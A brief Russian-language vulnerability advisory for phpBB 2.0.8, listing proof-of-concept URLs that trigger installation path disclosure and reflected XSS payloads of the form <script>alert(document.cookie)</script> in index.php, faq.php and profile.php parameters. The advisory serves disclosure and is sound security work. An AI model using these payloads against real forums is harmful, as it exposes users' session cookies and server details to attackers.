Программа: phpBB 2.0.8 

Несколько уязвимостей в phpBB позволяют удаленному пользователю определить инсталляционный путь и выполнить XSS нападение. 

1. Раскрытие пути: 

http://localhost/phpbb208/index.php? category_rows=waraxe
http://localhost/phpbb208/faq.php? faq=w araxe
http://localhost/phpbb208/faq.php? mode=bbcode&faq=waraxe
http://localhost/phpbb208/profile.php? mode=viewprofile&u=2&ranksrow=waraxe
http://localhost/phpbb208/index.php? category_rows[0][cat_id]=1

2. XSS:

http://localhost/phpbb208/index.php? category_rows[0] [cat_id]=1&category_rows[0]
[cat_title]=waraxe<script> alert(document.cookie); </script>&category_rows[0]
[cat_order]=99
http://localhost/phpbb208/faq.php?faq[0][0]=f00<script> alert(document.cookie);</script>bar
&faq[0][1]=waraxe
http://localhost/phpbb208/faq.php?mode=bbcode&faq[0] [0]=f00<script>alert(document.cookie);
</script>bar&faq[0][1]=waraxe

Оставить мнение